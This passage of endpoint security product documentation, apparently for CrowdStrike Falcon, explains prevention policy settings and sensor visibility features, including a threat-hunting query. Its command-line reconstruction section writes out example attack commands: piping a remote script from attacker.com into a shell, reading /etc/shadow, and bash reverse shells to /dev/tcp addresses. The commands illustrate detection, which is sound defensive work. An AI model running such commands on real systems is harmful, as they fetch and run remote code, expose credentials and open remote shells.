Sensor Capabilities	-	Sensor Tamper Prevention	Enabled
Sensor Capabilities	-	Suspicious File QuickScan Pro Analysis	Customer preference
Sensor Visibility	Enhanced Visibility	Enhanced Network Visibility	Enabled
Sensor Visibility	Enhanced Visibility	Script-Based Execution Visibility	Enabled
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Detection	Aggressive
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Prevention	Moderate+
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Adware & Pup - Detection	Aggressive
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Adware & Pup - Prevention	Moderate+
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Detection	Aggressive
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Prevention	Moderate+
Next-Gen Antivirus	Sensor Machine Learning	Sensor Adware & PUP - Detection	Aggressive
Next-Gen Antivirus	Sensor Machine Learning	Sensor Adware & PUP - Prevention	Moderate+
Next-Gen Antivirus	On Write	Detect on Write	Enabled
Next-Gen Antivirus	On Write	Quarantine on Write	Enabled
Next-Gen Antivirus	Quarantine	Quarantine	Enabled
Malware Protection	Execution Blocking	Custom Indicator Blocking	Enabled
Malware Protection	Execution Blocking	Suspicious Process Prevention	Enabled
Malware Protection	Execution Blocking	Intelligence-Sourced Threat Prevention	Enabled
Behavior-based Prevention	Unauthorized Remote Access IOAs	XPCOM Shell Prevention	Enabled
Behavior-based Prevention	Unauthorized Remote Access IOAs	Chopper Webshell Prevention	Enabled
Behavior-based Prevention	Unauthorized Remote Access IOAs	Empyre Backdoor Prevention	Enabled
Behavior-based Prevention	Credential Dumping IOAs	KcPassword Decoded Prevention	Enabled
Behavior-based Prevention	Credential Dumping IOAs	Hash Collector Prevention	Enabled

Linux prevention policy recommendation settings

Table 1. Enhance Systemd Visibility
Type	Category	Setting	Recommendation
Sensor Capabilities	-	Unknown Executable Analysis and Unknown Detection-Related Executable Analysis	Enabled
Sensor Capabilities	-	Sensor Tamper Prevention	Enabled
Sensor Capabilities	-	Suspicious File QuickScan Pro Analysis	Customer preference
Sensor Visibility	Enhanced Visibility	Script-Based Execution Visibility	Enabled
Sensor Visibility	Enhanced Visibility	SSH Visibility	Enabled
Sensor Visibility	Enhanced Visibility	Filesystem Visibility	Enabled
Sensor Visibility	Enhanced Visibility	Network Visibility	Enabled
Sensor Visibility	Enhanced Visibility	HTTP Visibility	Enabled
Sensor Visibility	Enhanced Visibility	FTP Visibility	Enabled
Sensor Visibility	Enhanced Visibility	TLS Visibility	Enabled
Sensor Visibility	Enhanced Visibility	Email Protocol Visibility	Enabled
Sensor Visibility	Enhanced Visibility	Extended Command Line Visibility	Enabled
Sensor Visibility	Enhanced Visibility	Memory Visibility	Enabled
Sensor Visbility	Enhanced Visibility	D-Bus Visibility	Enabled
Sensor Visibility	Enhanced Visibility	Enhance PHP Visibility	Enabled
Sensor Visibility	Enhanced Visibility	PHP Script Optimization	Customer preference
Sensor Visibility	Enhanced Visibility	Enhance Systemd Visibility	Enabled
Sensor Visibility	Enhanced Visibility	Environment Variable Visibility	Enabled
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Detection	Aggressive
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Prevention	Moderate+
Next-Gen Antivirus	On Write	On Write Script File Visibility	Enabled
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Detection	Aggressive
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Prevention	Moderate+
Next-Gen Antivirus	Quarantine	Quarantine	Enabled
Malware Protection	Execution Blocking	Custom Indicator Blocking	Enabled
Malware Protection	Execution Blocking	Suspicious Process Prevention	Enabled
Container Protection	Execution Blocking	Container Drift Prevention	Enabled

Machine Learning levels

Level	Description
Disabled	Disable all detections or preventions.
Cautious	Detect or prevent only when our machine learning system has high confidence that something is malicious.
Moderate	Detect or prevent when our machine learning system has moderate confidence that something is malicious. We recommend this setting for most use cases. This setting also detects and prevents activity that would be detected or prevented by Cautious.
Aggressive	Detect or prevent when our machine learning system has low confidence that something is malicious. This setting also detects and prevents activity that would be detected or prevented by Moderate and Cautious.
Extra Aggressive	Detect or prevent when our machine learning system has the lowest confidence that something is malicious. This setting also detects and prevents activity that would be detected or prevented by Aggressive, Moderate, and Cautious.

Sensor Capabilities

End User Notifications

Requirements:

Subscription: Falcon Prevent
Supported platforms: Windows and Mac

This setting controls whether the Falcon sensor displays a notification when a prevention action occurs. It also writes to the local Windows Event Viewer on Windows hosts. Only the first notification within a 60-second time span is shown to the end user. All subsequent messages within the 60-second threshold are suppressed. This setting has no relevance for detection-only events, and it also has no security implications.

Windows

Windows 7 and 8 use balloon notifications, while Windows 10 uses toast-style messages. All events that result in a notification, regardless of timing, are written to the Windows Application and Services Log.

Mac

Notifications for Mac hosts default to banners.

Unknown Executable Analysis and Unknown Detection-Related Executable Analysis

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platforms: Windows, Mac, and Linux

Note: This feature isn’t available in CrowdStrike clouds EU-1, US-GOV-1, or US-GOV-2.

An unknown executable is a file with a hash that doesn't match any samples in the CrowdStrike cloud. Unknown executable files include:

Windows PE (Portable Executable)
Mac Mach-O (Mach Object)
Linux ELF (Executable and Linkable Format)

If unknown executables are seen or executed on a host, the Enable Unknown Executable Analysis and Enable Unknown Detection-Related Executable Analysis settings control whether those files are then uploaded to the CrowdStrike cloud for analysis. These files are never shared with any third party.

Enable Unknown Executable Analysis to allow hosts to upload any unknown executable files. For Windows, these files are uploaded if they’re executed or written to disk. For Mac and Linux, these files are uploaded only if they’re executed.
Enable Unknown Detection-Related Executable Analysis to allow hosts to upload only unknown executable files that have triggered detections.

Uploading unknown executables improves CrowdStrike’s machine learning (ML) models, reduces false positives, increases true positives, and increases the overall efficacy of CrowdStrike detections. CrowdStrike stores uploaded files securely for the purpose of improving detections and never shares them with any other customer or organization.

When unknown executable uploads are enabled, the sensor uploads files that match these criteria:

They are unique in the CrowdStrike cloud (based on the file’s hash) and thus have not been uploaded previously
Are 32MB or smaller in size to conserve bandwidth
They don't belong to a sensor visibility exclusion that’s been applied to the host
They don't belong to an applicable machine learning exclusion that’s been applied to the host

We also incorporate the data from these uploaded files into our future machine learning training to reduce false positives and increase true positives.

To exclude certain files and folders from being uploaded, create a machine learning (ML) exclusion with the Uploads to CrowdStrike checkbox selected, and then wait for the policy to be applied. For more info, see Exclusions.

Create ML exclusion with Uploads to CrowdStrike checkbox selected

Linux

Before you enable either of these settings, you must enable Cloud Anti-malware.

Sensor Tamper Prevention

Requirements:

Subscription: Falcon Prevent
Supported platforms: Windows, Mac, and Linux

Important: User mode of the Falcon sensor for Linux supports blocking capabilities for hosts running on ARM kernels that are version 6.0 and later only. The sensor still creates detections in user mode for hosts running on ARM kernels that are earlier than version 6.0. Blocking capabilities are supported in user mode for all supported Linux kernel versions that are not ARM architecture. Blocking capabilities are supported in kernel mode for all supported Linux kernel versions and architectures.

When enabled, this setting blocks attempts to tamper with the sensor. If disabled, the sensor still creates detections for tampering attempts but doesn’t block them. This is one of our most critical prevention settings, because it's very common for adversaries to attempt to disable endpoint security in order to evade detection and/or to establish persistence.

Important: Enabling the Sensor tamper prevention policy setting does not block uninstallation of the sensor on your hosts. To prevent unauthorized uninstallation of the sensor, enable the Uninstall and maintenance protection sensor update policy setting for your hosts. For more info, see Managing sensor maintenance and uninstallation.

Windows: When enabled, it protects the sensor-related files, folders, and registry objects from renaming or deletion.

Mac: When enabled, it protects the sensor-related files and folders from modification, renaming, or deletion.

Linux: When enabled, it protects additional sensor resources, such as memory and BPF resources, from modification.

Tip: To use utility tools like bpftool on Linux hosts with Sensor tamper prevention enabled, ensure that the tools have read-only access to the BPF maps.

Suspicious File QuickScan Pro Analysis

Requirements:

Requires one of these subscriptions:
- Falcon Insight XDR
- Falcon Prevent
Requires one of these additional subscriptions:
- Falcon Adversary Intelligence
- Falcon Adversary Intelligence Premium
Supported platforms: Windows, Mac, and Linux

When the Suspicious file QuickScan Pro analysis prevention policy setting is enabled, files are intelligently selected and uploaded to QuickScan Pro based on AI-optimized criteria designed to maximize malware visibility with minimal endpoint resource impact.

This prevention policy setting works independently and doesn't require other prevention policy settings as prerequisites. Unlike the unknown executables flow which uploads all unrecognized files, this targeted approach uses machine learning to prioritize files with the highest potential for malicious verdicts, optimizing malware conversion rates while reducing upload volume. Files larger than 32MB are excluded from upload. Sensor visibility exclusions apply.

The intelligent file selection algorithm analyzes these trigger sources to identify files for upload:

File written events
Static analysis response events
Module load events
Driver load events
File rename events

Important: Legal Disclaimer. You acknowledge and accept that files submitted might contain confidential information, including personal and sensitive information, and we may retain these files for security research and product improvement purposes as permitted under our Terms and Conditions and Privacy Notice. You may configure exclusions to prevent files in trusted file paths from being uploaded to the CrowdStrike cloud. For more information, see Sensor visibility exclusions.

Enhanced Visibility category

The Enhanced Visibility category contains settings that expand the awareness of the Falcon sensor to provide additional event data.

Enabling these settings provides IOA-based features with additional data to help improve the detection and prevention of potentially malicious activity. This also significantly enhances your investigation and threat-hunting capabilities.

Additional User Mode Data Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Windows

Important: This setting is inoperative on Windows ARM64-based hosts.

The Additional User Mode Data Visibility (AUMD) allows the sensor to gather additional data from the user-mode component by loading a library that hooks system APIs. This uses our DLL injection to track process and thread activity which leverages internal or private APIs, which will help surface detections related to process hijacking or unauthorized reads of process data. There is endpoint telemetry that can only be gathered through user-mode hooking, as in the case of programs using APIs for system interaction through a GUI manager application instead of using the command-line. This component is a separate DLL (umppc.dll) that gathers critical data for enabling exploit mitigation, additional detections, and events from user mode that cannot be gathered from kernel mode.

This user-mode data is required for multiple key prevention policies and several high-confidence detections around credential theft and process migration.

Additional User Mode Data Visibility is a prerequisite for these settings:

Exploit Mitigation > ASLR Bypass Prevention
Exploit Mitigation > DEP Bypass Prevention
Exploit Mitigation > Heap Spray Pre-allocation Prevention
Exploit Mitigation > NULL Page Allocation Prevention
Exploit Mitigation > SEH Overwrite Prevention
Exploitation Behavior > Code Injection Prevention
Lateral Movement and Credential Access > Credential Dumping Prevention

Because AUMD is functioning at the user mode level, interaction conflicts with other security tools occasionally occur. There isn't a detection in such cases, the conflicting tool simply doesn't run. In that scenario, move a test system into a policy where AUMD is disabled, reboot the host and retry. If the security tool now runs, open a Support case for assistance in resolving the conflict.

You can see processes AUMD is hooked into by running the following from a command-line on a host:

tasklist /m umppc* <ENTER>

D-Bus Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Sensor: Falcon sensor for Linux 7.26 or later running in User Mode. Sensors running in Kernel Mode (KM) will not support this setting, and enabling this setting on hosts running in KM will have no effect.
Default roles: Falcon Admin
Supported platform: Linux

When the D-Bus Visibility policy setting is enabled on hosts, the Falcon sensor generates telemetry that provides visibility into D-Bus messages flowing over local Unix sockets between processes. This is captured in the form of a new event: DBusMessage. The sensor will produce events for each message and apply any relevant detections.

The D-Bus communication model allows for different types of methods or signals to be used for inter-processing communication. However, only method call messages will be clouded.

Email Protocol Visibility

Requirements:

Subscription: Falcon Prevent or Falcon Insight XDR

Supported platform: Linux

Sensor support: Falcon sensor for Linux 6.53 and later
Note: This feature is available for the sensor running in kernel mode. User mode is supported with the Falcon sensor for Linux version 7.11 and later.

CrowdStrike clouds: Available in all clouds

Monitor SMTP, IMAP, and POP3 traffic for malicious patterns and improved detections. The resulting telemetry enhances hunting capabilities and enables future IOA-based detections for multiple threat categories. Once enabled, Email Protocol Visibility provides visibility into the following events:

Note: Depending on the role of the host, such as a mail or mail relay server with Email Protocol Visibility enabled, you might see an increase in host CPU utilization.

Extended Command Line Visibility

The Extended Command Line Visibility prevention policy enhances your Linux security monitoring by providing detailed visibility into complex shell commands, including pipes and redirections. This helps security teams better understand command execution patterns for potential threats.

Extended Command Line Visibility requirements

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Linux
Sensor support: Falcon sensor for Linux 7.22 and later, running in user mode only

Supported shell types and operators

Supported operators for supported shell types:

Shell	Operator
bash	`\|&`, `\|`, `<`, `>`, `>>`, `&>`, `&>`, `2&>1`, `&>>`, `<>`, `2>`, `2>>`, `<<`, `<<<`
dash	`\|`, `<`, `>`, `>>`, `2&>1`, `<>`, `2>`, `2>>`
tcsh	`\|`, `\|&`, `<`, `>`, `&>`, `>>`, `&>>`

How Extended Command Line Visibility works

When this prevention policy setting is disabled, complex commands that raise detections are displayed in the Falcon console as basic commands. However, when you enable Extended Command Line Visibility on a Linux prevention policy, the sensor parses and reconstructs complex commands, such as piped commands and reverse shell commands, to show you the full command structure. This provides a more accurate representation by revealing underlying operations, without terminating or blocking CLI commands or scripts.

Important: We only reconstruct interactive shell commands or commands within shell scripts that have job control enabled.

The table shows a comparison of how complex commands are shown when the policy is enabled and disabled.

Extended Command Line Visibility \| enabled	Extended Command Line Visibility \| disabled
`curl http://example.com/example.sh \| sh`	`curl http://example.com/example.sh`
`cat /etc/passwd > example.txt`	`cat /etc/passwd`
`bash -i >& /dev/tcp/203.0.113.1/9001 0>&1`	`bash -i`

Memory impact and policy configuration

The Extended Command Line Visibility prevention policy setting is part of the Enhanced Visibility category of the Linux prevention policy.

This policy setting is disabled by default. Before you enable this setting, consider the following requirements:

For any new and existing policy, this setting must be manually enabled.
For each host, enabling the policy setting might result in a small increase in host memory consumption. Even for extremely large workloads with interactive shell executions, we anticipate that the additional memory requirement will not exceed 110MB per host in the worst-case scenario of extremely large workloads with interactive shell executions.
You might notice a minor increase in sensor CPU utilization and a small increase in total time to complete workloads with shell redirects that have long file paths.

Important: Consider this memory requirement when planning your deployment, especially for environments with many sensors.

Enable Extended Command Line Visibility

To enable Extended Command Line Visibility, set it when you create a new policy or edit an existing policy.

Create a prevention policy
Edit a prevention policy

Extended Command Line Visibility limitations

Extended Command Line Visibility has several important limitations that affect command reconstruction. The following sections detail these limitations across different categories.

Operator limitations

Operators && and || cannot be reconstructed. For example, a piped command with an AND or OR operator displays 2 detections with no logical connection:

Original command: cat /etc/shadow | grep root > example.txt || curl -s http://attacker.com/backdoor.sh | sh
Reconstructed result:
- cat /etc/shadow | grep root > example.txt
- curl -s http://attacker.com/backdoor.sh | sh

Built-in command and binary execution failures

Built-in shell commands, such as cd, or binaries that fail to execute in a shell are reconstructed with an (unknown) placeholder. For example, the following command is reconstructed with a placeholder:

Original command: cd /path/example | example
Reconstructed command: (unknown) | example

Built-in command limitations

Command reconstruction for shell built-in commands only occurs if there is at least one pipe (|) in the command line. For example:

Not reconstructed: echo "hello" > /tmp/xyz
Reconstructed: echo "hello" > /tmp/xyz | grep "foobar"

Dash shell limitations

Command reconstruction for a dash shell only occurs if there is at least one pipe (|) in the command line. For example:

Not reconstructed: cat /etc/passwd > /tmp/xyz
Reconstructed: cat /etc/passwd > /tmp/xyz | grep "foobar"

tty redirection limitations

When a command includes a redirection to a tty assigned to the shell process, the redirection is not in the reconstructed output. For example:

Command cat /etc/passwd 2>&1 is reconstructed as cat /etc/passwd
Command cat /etc/passwd 2>&1 > /tmp/out is reconstructed as cat /etc/passwd > /tmp/out

Command line and file name length limitations

Commands are truncated, and the keyword truncated is appended to the reconstructed command line when length limits are exceeded.

Description	Command	Reconstruction
Commands that have more than 10 commands in a shell pipeline are not captured	`cmd_1 \| cmd_2 \| cmd_3 \| cmd_4 \| cmd_5 \| cmd_6 \| cmd_7 \| cmd_8 \| cmd_9 \| cmd_10 \| cmd_11`	`cmd_1 \| cmd_2 \| cmd_3 \| cmd_4 \| cmd_5 \| cmd_6 \| cmd_7 \| cmd_8 \| cmd_9 \| cmd_10 (truncated)`
Reconstructed command line that exceeds 4096 bytes	`cmd_1_4000_bytes \| cmd_2_1000_bytes`	`cmd_1_4000_bytes \| cmd_2_1000_bytes (truncated)`
Redirected file names for standard file descriptors that exceed 512 bytes	`cmd_1 > /file_name_600_bytes \| cmd_2`	`cmd_1 > /file_name_600_bytes (truncated) \| cmd_2`

Network redirect command limitations

Command reconstruction for network redirects occurs only if an IPv4 address is used.

Behavior with Sensor Visibility Exclusion (SVE) configured

Sensor Visibility Exclusion (SVE) settings affect command reconstruction in the following two ways:

When configured for shells or executed binaries
When the 'Apply to all descendant processes' option is enabled

Scenario 1

cmd_1 enabled with "Apply to all descendant processes":

Command	Reconstructed	Reason
`sudo cmd_1 \| cmd_2`	Yes	Even though `cmd_1` is excluded, reconstruction occurs because `sudo` is executed directly by `shell(bash)`
`cmd_1 \| cmd_2`	No	`cmd_1` is configured to be excluded
`built-in \| cmd_2`	Yes	Neither `shell(bash)` nor `cmd_2` are excluded

Scenario 2

Both shell and cmd_1 enabled with "Apply to all descendant processes":

Command	Reconstructed	Reason
`sudo cmd_1 \| cmd_2`	No	`shell`(`bash`) and its descendant processes are excluded
`cmd_1 \| cmd_2`	No	`shell`(`bash`) and its descendant processes are excluded
`built-in \| cmd_2`	No	`shell`(`bash`) and its descendant processes are excluded

Scenario 3

Shell enabled without "Apply to all descendant processes", cmd_1 enabled with "Apply to all descendant processes":

Command	Reconstructed	Reason
`sudo cmd_1 \| cmd_2`	Yes	Reconstruction occurs because `sudo` is executed directly by `shell`(`bash`), and shell exclusion does not apply to descendants
`cmd_1 \| cmd_2`	No	`cmd_1` is configured to be excluded
`built-in \| cmd_2`	No	`built-in` is a forked process from excluded `shell`(`bash`)

Shell-specific command reconstruction examples

The following sections show how commands are reconstructed across different shell types.

Bash shell reconstruction

This table shows how bash commands are reconstructed when Extended Command Line Visibility is enabled.

Original Command	Reconstructed As
`>\|`(with or without no clobber option set)	`>`
`\|&`	`2>&1 \|`
`&>word` and `&>word`	`>word 2>&1`
`&>>word`	`>>word 2>&1`
`<<[-](Here Documents)` and `<<< (Here Strings)`	`< /tmp/sh-thd`
`<&word` (duplication),`<&digit-` (moving) and `<>` (read/write) file descriptors	See Example 1
`>>` for network redirects	See Example 2

Example 1: File Descriptor Reconstruction for bash

Original: exec 3<> /tmp/out && wc <&3 &>&3
Reconstructed: wc </tmp/out> /tmp/out
Note: Only reconstructed when File Descriptor is used as STDIN, STDOUT or STDERR for redirection.

Example 2: Network Redirect Reconstruction for bash

Original: bash -i &>> /dev/tcp/127.0.0.1/7777 0>&1
Reconstructed: bash -i &> /dev/tcp/127.0.0.1/7777 0>&1

Dash shell reconstruction

This table shows how dash commands are reconstructed when Extended Command Line Visibility is enabled.

Original Command	Reconstructed As
`>\|`(with or without no clobber option set)	`>`
`2>&1 \|`	`2>&1 \|`
`<<[-](Here Documents)`	Not supported
`<&n, &>n` (copy), `<&-`, `&>-` (close) and `<>` (read/write) file descriptors	See Example 1
Builtins with `STDOUT` redirect to file, followed by redirect to `\|`	See Example 2

Example 1: File Descriptor Reconstruction for dash

Original: exec 3<>/tmp/out && wc <&3 2>&3 | tee logfile
Reconstructed: wc <> /tmp/out 2>&0 | tee logfile
Note: Only reconstructed when a file descriptor is used as STDIN, STDOUT or STDERR for redirection.

Example 2: Built-in Command reconstruction for dash

Original: echo "world" > /tmp/xyz | grep "foobar"
Reconstructed: (unknown) | grep foobar
Note: Only the final redirect to | is reconstructed

Tcsh shell reconstruction

This table shows how tcsh commands are reconstructed when Extended Command Line Visibility is enabled.

Original Command	Reconstructed As
`<<`	Not supported
`>! and >>!` (with or without no clobber option set)	`>` and `>>` respectively
`&>! and &>>!` (with or without no clobber option set)	`> (filename) 2>&1 and >> (filename) 2>&1` respectively
`\|&`	`2>&1 \|`

Enhanced DLL Load Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported operating systems: Windows Server 2012 and later
Sensor support: Falcon sensor for Windows versions 7.20 and later

When enabled, Enhanced Dynamic Link Library (DLL) Load Visibility collects additional information on DLLs that are loaded into a process. This setting improves detection coverage at DLL load time and allows the sensor to send additional telemetry using the ClassifiedModuleLoad event.

Enhanced DLL Load Visibility generally has a negligible impact on CPU performance and telemetry generation. However, when running workloads that have a high number of DLL loads, a small performance reduction can occur. We recommend testing on critical applications before enabling this feature in production environments.

Note: This setting has no impact on hosts running workstation versions of Windows, as this capability has long been available by default on workstations.

Note: This setting supports sensor visibility exclusion. Configuring a sensor visibility exclusion for a specific process eliminates any performance overhead associated with this setting.

Enhanced Exploitation Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported operating systems:
- Windows 10 version 1809 and later
- Windows Server 2019 and later
Sensor support: Falcon sensor for Windows versions 7.05 and later

Enhanced Exploitation Visibility enables sources of telemetry in Windows that are disabled by default by Microsoft. This provides the Falcon sensor with enriched visibility into exploitation techniques that are commonly leveraged by adversaries to exploit operating system- or application-level security vulnerabilities.

When the Enhanced Exploitation Visibility policy setting is enabled, the sensor enables exploit mitigation telemetry built into the Windows operating system. With these Windows settings, the sensor sees additional data that helps detect common exploitation techniques. The sensor further enriches this data for event generation. For example, the sensor can determine if an adversary changes memory protections to create the necessary conditions for further execution, such as loading and executing malicious code.

Enhanced Exploitation Visibility generates events for these types of processes:

Productivity applications, such as Microsoft Office and Adobe Acrobat Reader
Google Chrome and Microsoft Internet Explorer
Command line interfaces, such as Command Prompt and PowerShell

Enhanced Exploitation Visibility settings are exclusively applied on a per-process basis. There are no persistent changes to system or registry settings when this feature is enabled. However, exploit mitigation violation events will be written by the operating system to the event log. If needed, applications can be specifically excluded.

If you have applications that already have Windows exploit protection settings enabled independently of your prevention policies, the Falcon sensor receives that telemetry data and will not change predefined settings.

Performance considerations

Enhanced Exploitation Visibility should only have negligible CPU performance and sensor-related network-traffic impact when processing applicable telemetry data from web browsers and productivity apps. Generated telemetry will also be reflected in event logs that can be monitored through event log applications such as Event Viewer.

Note: Sensor visibility exclusions don't apply to Enhanced Exploitation Visibility, however, string-based allow lists (SBAL) are available using support-enacted allowlisting requests.

Enhanced Network Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Sensor: Falcon sensor for Mac 7.29 or later
CrowdStrike clouds: Available in US-1, US-2, EU-1, and GOV-1

Turn on the Enhanced Network Visibility prevention policy setting to gain insight and improved visibility into network traffic occurring on macOS endpoints. Enhanced network visibility supplements process activity monitoring with attributes derived from the contents of network traffic. This monitoring identifies specific application protocols, analyzes TLS (encrypted) traffic characteristics, and examines plaintext HTTP content. This feature does not perform decryption of any network traffic.

Enhanced network visibility includes JA4 fingerprinting of TLS connections. This enhancement provides a summarized representation or signature of the capabilities and configuration of a specific TLS client library. This signature is derived from the TLS "client hello" packet, the first step in establishing a secure connection. JA4 can be used to differentiate between otherwise indistinguishable TLS connections; also, it can provide evidence of proxying if a single process exhibits several unique JA4 signatures.

Supported protocols

Enhanced network visibility supports parsing of plaintext HTTP requests and responses and TLS client hello packets.

Additionally, enhanced network visibility identifies the use of the HTTP, TLS, SOCKS4/5, Wireguard, SSH, SMB, VNC, ARD, or DNS protocol on any network port, and emits an AppProtocolDetected event when a process makes use of one of these protocols. Limited visibility into proxied network traffic is also supported.

Protocol	AppProtocol value	Capability	Description
HTTP 1.x	110	Identify and Inspect	Plaintext HTTP requests and responses
TLS	102	Identify and Inspect (partial)	TLS client session establishment Only the “TLS Client Hello” is inspected; no traffic decryption is performed.
SOCKS4 SOCKS5	104	Identify and Inspect	SOCKS proxy traffic Encapsulated traffic is identified and inspected as well.
Wireguard	105	Identify	Wireguard VPN
SSH	108	Identify	Secure shell
SMB	112	Identify	File sharing
VNC, ARD	107	Identify	Apple Remote Desktop (ARD) or VNC screen sharing
QUIC	103	Identify	IETF QUIC (and HTTP/3) traffic.
DNS	100	Identify and Inspect	Domain Name System

Related Falcon Next-Gen SIEM events

There are four Next-Gen SIEM events related to enhanced network visibility:

HttpRequest
HttpResponse
TlsClientHello
AppProtocolDetected

HttpRequest

This event contains the request type, URL, headers, and body of a plaintext HTTP request. These are the fields for this event:

Field	Description
`ImageFileName`	The full path of the requesting process
`CommandLine`	The command line of the requesting process
`DomainName`	The hostname, if provided by the Apple network framework
`RemoteAddress[IP4\|IP6]`	The remote IP address
`RemotePort`	The remote port number
`HttpMethod`	The HTTP method Examples: GET, POST, CONNECT
`HttpHost`	The contents of the host header, or empty if not present
`HttpPath`	The HTTP uri / path
`HttpRequestHeader`	A string containing the header block
`HttpUserAgent`	The HTTP user agent header value
`HttpBodyAsString`	The POST or PUT body in decoded form, truncated if necessary

For more event info, see HttpRequest.

HttpResponse

This event contains the response code and headers of a plaintext HTTP response. These are the fields for this event:

Field	Description
`ImageFileName`	The full path of the requesting process
`CommandLine`	The command line of the requesting process
`DomainName`	The hostname, if provided by the Apple network framework
`RemoteAddress[IP4\|IP6]`	The remote IP address
`RemotePort`	The remote port number
`HttpStatus`	The numeric HTTP status Example: 404
`HttpStatusText`	The status string Example: NOT FOUND
`HttpPath`	The HTTP uri path
`HttpResponseHeader`	A string containing the header block

For more event info, see HttpResponse.

TlsClientHello

This event contains information derived from the client side of a TLS client connection establishment. This info includes the server name indication value (SNI), next protocol (ALPN), and the JA3 and JA4 client fingerprints. These are the fields for this event:

Field	Description
`ImageFileName`	The full path of the requesting process
`CommandLine`	The command line of the requesting process
`DomainName`	The hostname, if provided by the Apple network framework
`RemoteAddress[IP4\|IP6]`	The remote IP address
`RemotePort`	The remote port number
`TlsVersion`	The TLS version
`TlsServerName`	The TLS server name indication (SNI) field
`Ja3ClientFingerprint`	The JA3 TLS client fingerprint
`Ja4ClientFingerprint`	The JA4 TLS client fingerprint

For more event info, see TlsClientHello.

AppProtocolDetected

This event contains the network protocol being used. It supplements host and port information provided by existing network based telemetry, including NetworkConnect and NetworkAccept. These are the fields for this event:

Field	Description
`ImageFileName`	The full path of the requesting process
`CommandLine`	The command line of the requesting process
`DomainName`	The hostname, if provided by the Apple network framework
`RemoteAddress[IP4\|IP6]`	The remote IP address
`RemotePort`	The remote port number
`AppProtocol`	The application protocol identified

For more event info, see AppProtocolDetected.

Example: Hunting for application tunnelling

Application tunnelling is a technique used by threat actors. It has these characteristics:

Allows encapsulating network traffic inside other legitimate and allowed protocols
Blends in with other applications on the endpoint
Bypasses network layer defenses
Becomes an ingress point into environments

We need to identify a single process generating multiple and distinct JA4 fingerprints. It is not unusual for a process to be observed with multiple fingerprints. For example, when negotiating a TLS connection to a server, the request can be upgraded or downgraded based on available TLS versions. This request generates multiple JA4 fingerprints. We are looking for distinct features in the middle and last blocks found in the JA4 fingerprint when compared to each other.

When reviewed in the context of what those blocks represent, it seems likely that another application's network traffic is potentially being tunneled through this process.

This LogScale query looks for these characteristics:

Unsigned macOS binaries
Outside system directories, either user-installed or dropped by malware
Network connections with varying TLS fingerprints

This combination strongly suggests malware or C2 implants trying to evade network detection.

defineTable(
query={ #event_simpleName=TlsClientHello event_platform=Mac
| splitString(by="\_", as=JA4Blocks, field=TlsClientFingerprintJa4)
| groupBy([aid, ContextProcessId, ImageFileName], function=[count(field=JA4Blocks[1], as=countBlock1, distinct=true), count(field=JA4Blocks[2], as=countBlock2, distinct=true), collect(TlsClientFingerprintJa4), collect(JA4Blocks[0]), collect(JA4Blocks[1]), collect(JA4Blocks[2])])
| countBlock1 > 1
| countBlock2 > 1
| groupBy([aid, ContextProcessId, ImageFileName, CommandLine, TlsClientFingerprintJa4, JA4Blocks[0], JA4Blocks[1], JA4Blocks[2]])
}, name="multiple_ja4hahes", start=7d, include=*)
| event_platform=Mac #event_simpleName="ProcessRollup2" TeamId="-" 
| NOT in(field="ImageFileName", values=["/System/*", "/usr/*"])
| match(file="multiple_ja4hahes", field="TargetProcessId", column="ContextProcessId")
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| table([@timestamp, aid, GraphExplorer, TlsClientFingerprintJa4, TeamId, SigningId, CommandLine, ImageFileName], limit=20000) | sort(cid, limit=20000)

The output of this query returns processes matching your criteria with details about these items:

Process hierarchy
Command lines
JA4 fingerprint variations
Agent and endpoint information

ImageFileName is filtered to exclude the /System/ and /usr/ directories. This exclusion will likely need to be expanded after a general search has identified which processes or execution paths are valid, for processes and applications such as proxies and VPNs.

Enhance PHP Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Sensor: Falcon sensor for Linux 7.28 or later running in User Mode.
Default roles: Falcon Admin
Supported platform: Linux

When the Enhance PHP Visibility setting in the Enhanced Visibility category is enabled on hosts, the Falcon sensor increases visibility into script activity and detects potentially malicious web shell attacks. Monitored activity includes:

PHP script execution
PHP script execution with eval() function in use
PHP script execution with base64_decode() function in use

The sensor produces the following events:

PhpExecuteScript
PhpEvalString
PhpBase64Decode

Enhance Systemd Visibility

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Sensor: Falcon sensor for Linux 7.34 or later, running in user mode
- This setting is only supported on sensors running in user mode. Sensors running in kernel mode do not support this setting, and enabling this setting on hosts running in kernel mode has no effect.
Default roles: Falcon Admin
Supported platform: Linux

The Enhance Systemd Visibility setting improves monitoring and management of systemd services and timer activities by providing visibility into the creation and deletion of short-lived services and timers, as well as modifications to their properties.

Malicious actors abuse systemd primarily to establish persistence, for privilege escalation, and for defense evasion on Linux systems by creating, modifying, disabling, or hijacking systemd service and timer unit files. By creating or hijacking systemd services and timers that are loaded into memory to run in the system context, attackers enable malicious payloads to run automatically at boot or at regular intervals with high privileges. Adversaries may use systemd in hands-on-keyboard-based attacks (HOK) or living-off-the-land-based attacks (LOTL).

The sensor produces the following events:

SystemdServicePropertiesChanged
SystemdTimerPropertiesChanged

PHP Script Optimization

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Sensor: Falcon sensor for Linux 7.33 or later, running in user mode
